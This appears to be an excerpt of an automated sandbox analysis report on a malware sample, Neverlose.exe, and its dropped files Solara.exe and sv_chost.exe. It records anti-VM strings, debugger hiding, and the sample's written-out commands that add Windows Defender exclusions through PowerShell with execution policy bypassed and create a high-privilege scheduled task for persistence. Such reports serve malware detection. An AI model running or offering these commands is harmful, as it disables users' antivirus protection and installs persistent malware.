                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7046Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2756Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeWindow / User API: threadDelayed 8917Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeWindow / User API: threadDelayed 906Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeWindow / User API: threadDelayed 828Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeWindow / User API: threadDelayed 1768Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4423Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5338Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6457
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3269
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3519
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6196
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2460
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7028
                  Source: C:\Users\user\Desktop\Neverlose.exe TID: 2740Thread sleep count: 73 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exe TID: 2664Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6660Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exe TID: 7560Thread sleep time: -37815825351104557s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7328Thread sleep time: -10145709240540247s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7328Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7328Thread sleep time: -599891s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7328Thread sleep time: -599766s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7328Thread sleep time: -599657s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7328Thread sleep time: -599532s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7328Thread sleep time: -599422s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7328Thread sleep time: -599312s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7328Thread sleep time: -599203s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7328Thread sleep time: -599091s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7328Thread sleep time: -598970s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7328Thread sleep time: -598844s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7328Thread sleep time: -598730s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7328Thread sleep time: -598616s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7328Thread sleep time: -598495s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7328Thread sleep time: -598351s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7328Thread sleep time: -598168s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7272Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7512Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exe TID: 7688Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7908Thread sleep count: 6457 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7908Thread sleep count: 3269 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7944Thread sleep time: -5534023222112862s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exe TID: 8000Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8188Thread sleep time: -7378697629483816s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4856Thread sleep count: 2460 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4856Thread sleep count: 7028 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4476Thread sleep time: -4611686018427385s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exe TID: 7488Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exe TID: 7812Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exe TID: 7496Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeFile Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeFile Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeFile Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeFile Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeFile Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\Desktop\Neverlose.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599891Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599766Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599657Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599532Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599422Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599312Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599203Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599091Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598970Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598844Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598730Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598616Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598495Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598351Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598168Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeThread delayed: delay time: 922337203685477
                  Source: Solara.exe, 00000004.00000002.2921766888.000000001C0C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWd na%SystemRoot%\system32\mswsock.dllServiceModel.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35"/>
                  Source: Neverlose.exe, 00000000.00000002.1727100048.0000000001008000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: VBoxService.exe
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1770439761.0000000000E93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll9
                  Source: Neverlose.exe, Neverlose.exe, 00000000.00000002.1727100048.000000000114E000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ~VirtualMachineTypes
                  Source: Neverlose.exe, Neverlose.exe, 00000000.00000002.1727100048.000000000114E000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ]DLL_Loader_VirtualMachine
                  Source: Neverlose.exe, 00000000.00000002.1727100048.0000000001008000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: VMWare
                  Source: Neverlose.exe, 00000000.00000002.1727100048.000000000114E000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
                  Source: Neverlose.exe, 00000000.00000002.1727100048.0000000001008000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: &VBoxService.exe
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                  Anti Debugging

                  barindex
                  Hides threads from debuggers
                  Source: C:\Users\user\Desktop\Neverlose.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\Neverlose.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Adds a directory exclusion to Windows Defender
                  Source: C:\Users\user\Desktop\Neverlose.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe'
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe'
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\sv_chost.exe'
                  Source: C:\Users\user\Desktop\Neverlose.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe'Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe'Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\sv_chost.exe'Jump to behavior
                  Bypasses PowerShell execution policy
                  Source: C:\Users\user\Desktop\Neverlose.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe'
                  Source: C:\Users\user\Desktop\Neverlose.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe'Jump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeProcess created: C:\Users\user\AppData\Local\Temp\Solara.exe "C:\Users\user\AppData\Local\Temp\Solara.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeProcess created: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe "C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe'Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Solara.exe'Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\sv_chost.exe'Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'sv_chost.exe'Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "sv_chost" /tr "C:\Users\user\AppData\Roaming\sv_chost.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeQueries volume information: C:\Users\user\Desktop\Neverlose.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Solara.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeQueries volume information: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
